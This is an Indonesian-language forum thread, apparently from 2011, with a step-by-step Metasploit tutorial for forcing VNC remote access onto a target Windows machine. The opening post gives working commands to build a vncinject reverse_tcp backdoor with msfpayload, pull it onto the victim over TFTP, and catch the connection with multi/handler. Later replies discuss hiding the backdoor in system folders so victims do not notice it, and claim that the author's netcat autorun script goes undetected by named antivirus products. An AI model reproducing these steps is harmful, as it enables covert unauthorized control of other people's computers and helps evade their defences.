Indonesian Back|Track Team
Share Remote vnc komputer target dengan paksa - Printable Version

+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html)
+--- Forum: Exploitation (https://www.indonesianbacktrack.or.id/forum/forum-43.html)
+---- Forum: Metasploit (https://www.indonesianbacktrack.or.id/forum/forum-122.html)
+---- Thread: Share Remote vnc komputer target dengan paksa (/thread-116.html)

Pages: 1 2 3


Remote vnc komputer target dengan paksa - zee eichel - 05-13-2011

Sebelum kita membahasa tentang tehnik mendapatkan akses remote vlc via metasploit … sebaiknya teman-teman membaca ini postingan ini terlebih dahulu [.. http://forum.id-backtrack.com/showthread.php?tid=110 .. ] karena postingan ini merupakan sambungan dari postingan tersebut.

Seperti pada postingan saya yang lalu mengenai remote windows dengan backdoor.exe kita sudah mendapatkan akses shell komputer target… Jadi anggapan saya anda telah berhasil pada tutorial saya yang pertama dan telah mendapatkan akses shell target dengan mengunakan NC ( netcat ) dalam hal ini saya spesifisikan sebagai berikut :

Code:
komputer penyerang

- ip addr : 192.168.1.34
- os : backtrack R2

komputer target

- ip addr : 192.168.1.33
- os windows xp sp2

Diakesnya shell via netcat akan membuka kita untuk mengakses komputer korban

[Image: vlca3.png]

Langkah berikutnya kita harus membuat backdoor lagi .. hahaha maap ya.. kebanyakan bikin backdoor deh Tongue . Kalo pada tutorial sebelumnya kita membuat backdoor.exe yang di sisipi netcat kali ini kita buat backdoor via metasploit untuk membuka akses reverse_tcp yang nantinya akan membuat koneksi vnc …okey ..

ikuti langkah-langkah berikut ini

Code:
root@IBTeam:~# cd /pentest/exploits/framework3
root@IBTeam:/pentest/exploits/framework3# ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.34 LPORT=2482 x > /tmp/zee-ganteng.exe

ket : windows/vncinject/reverse_tcp —- payload yang di gunakan
LHOST = isikan ip anda
LPORT = isikan port yang memungkinkan ..
/tmp = direktori di mana kita akan mengesave backdoor …
mengapa di /tmp ? .. ya karena kita akan menggunakan fasilitas tftp ( default directory tftpd )
zee-ganteng.exe — nama backdoor , bisa gunakan nama sesuai kreasi ente Tongue

backdoor sudah tercipta

[Image: vlca5.png]

Seep tahap persiapan telah anda lewati .. sekarang mari kita exploitasi lebih lanjut.. Tongue . Pindahkan file backdoor yang barusan kita buat tadi ( zee-ganteng.exe ) ke komputer target Big Grin . Dengan ap ? ya dengan TFTPD service .

aktifkan dengan

menu —–>  service —–> TFTPD —–> TFTPD —–> start TFTPD

[Image: vlca8.png]

Sekarang anda mengerti kenapa saya memilih directory /tmp untuk mensave backdoor .. ya karena home directory TFTPD secara default berada di sana… Lanjut kang Big Grin

Untuk memindahkan backdoor tersebut bukanlah hal yang sulit ..

Pada shell windows tadi ketikan perintah :
Code:
tftp -i 192.168.1.34 GET /tmp/zee-ganteng.exe

[Image: vlca10.png]

Ok udah sukses perjalanan kita sampai di sini hehehe… sudah saatnya kita action sekarang … buka kembali shell pada tab baru .. masuk ke metasploit

Code:
root@IBTeam~# cd /pentest/exploits/framework3
root@IBTeam:/pentest/exploits/framework3# ./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.34 RPORT=2428 DisabledCourtesySHell=true Ewindows/vncinject/reverse_tcpwindows/vncinject/reverse_tcp

[Image: vlca13.png]

Nah tinggal kita jalankan saja file backdoor reverse_tcp tadi Smile

[Image: vlca14.png]

Perintah agar runnig hanya dengan menuliskan file yang hendak di esekusi terus enter.. perhatikan gambar di atas.

Setelah backdoor tersebut berhasil di aktifkan … we have the vnc server active

[Image: vlca17.png]

Bagi temen2 yang kurang jelas dengna tutorial ini. Silahkan mendownload video tutorial yang udah ane buat … just for share.. long live open source

video link :

http://www.ziddu.com/download/14923691/vnc.rar.html

watch online :

http://blip.tv/file/5128068
Cool
sumber : http://zeestuff.wordpress.com/2011/05/12/remote-paksa-kompi-target/


RE: Remote vnc komputer target dengan paksa - lucifer893 - 06-11-2011

permisi bang mau naya nih, tpi mav klo pertanyaan na anehh, msi newbi hehhe

kmren say nyobain remote window yg abng post bisa pi ad step yg gagal, pas pembuatan self install windows na sya sdikit bingung pas mau masukin packed file na dan install program sama post install commend na.. apkh nc na dimasukna pada install prgm atau file yg .vbs na.. kmren sya coba pas backdoor na mau dijalan ni kluar alert klo file .vbs na not found maupun sblik na... jdi kmren sya pake sistem paksa aja untuk jlni backdor na trus bisa dah remote windows na...
pi untuk post abng yg kedua tntang vnc remote sya sama skli ndak brhasil bang pas masuk ./msfcli trus code na sya tulis n djalni malah kta na module gak ada.. sya iseng nyobain lgi lwt ./msfconsole bisa tpi ttp aja vnc na gak ad... oia sblum nya sya jug udh coba ngatifin vnc server lwt menu services tapi hasil na ttp ndak bisa... mohon pencrahan na bang... n mav klo curhat na k pnjngan hahah


RE: Remote vnc komputer target dengan paksa - zee eichel - 06-12-2011

om paste di sini deh error pd console nya Smile


RE: Remote vnc komputer target dengan paksa - ivan_86 - 06-17-2011

kk ko di shell tulisan nya bisa warna ijo....pengen tuh kk gmn caranya
pleas pengguna baru


RE: Remote vnc komputer target dengan paksa - THJC - 06-17-2011

(06-17-2011, 09:44 PM)ivan_86 Wrote: kk ko di shell tulisan nya bisa warna ijo....pengen tuh kk gmn caranya
pleas pengguna baru

kog.. rada OOT ya...
Mending PM aja om Big Grin


RE: Remote vnc komputer target dengan paksa - zee eichel - 06-18-2011

pada terminal ada pilihan untuk ngeditnya.. bisa kok .. itu ane pake backtrack IV ...


RE: Remote vnc komputer target dengan paksa - R-12 - 06-20-2011

pintu belakang yg dipasang pada windows orang bisa di rapikantidk ini masalah nya itu bisa dilhat di file c: apakah gk bisa di buat folder misal C:\windows\system32\.. atau apa gitu suapaya korban ini tidak curiga... kemarin pernnaah taaaaak coba habis digabungin dengan fail apagitu seperti flass kkaya contonya... nah backdornya lari ke C: nah gimana kalo antivirus korban lebih kkuat... langsung tuh dideteksi fail exenya treen gagal deh :pc::pc::pc:


RE: Remote vnc komputer target dengan paksa - zee eichel - 06-21-2011

netcat tidak pernah di anggap virus ama antivirus bro .. coba aja Tongue sedangkan vscript yang ane bikin itu cuma autorunning nc ... jadi antivirus tidak medeteksinya sebagai virus ..

tested :

= kapersky 2011 internet security
= smadav pro
= avg


RE: Remote vnc komputer target dengan paksa - zallfaizall - 06-27-2011

Remote vnc komputer target dengan paksa bisa dbuat pake bactrak 5 ngak..?kerna saya ngak bisa start tftpd pake backtrack 5


RE: Remote vnc komputer target dengan paksa - zee eichel - 06-28-2011

tftpd harus di install terlebih dahulu.. gunakan fasilitas synaptic search untuk memudahkan anda menemukan tftpd Smile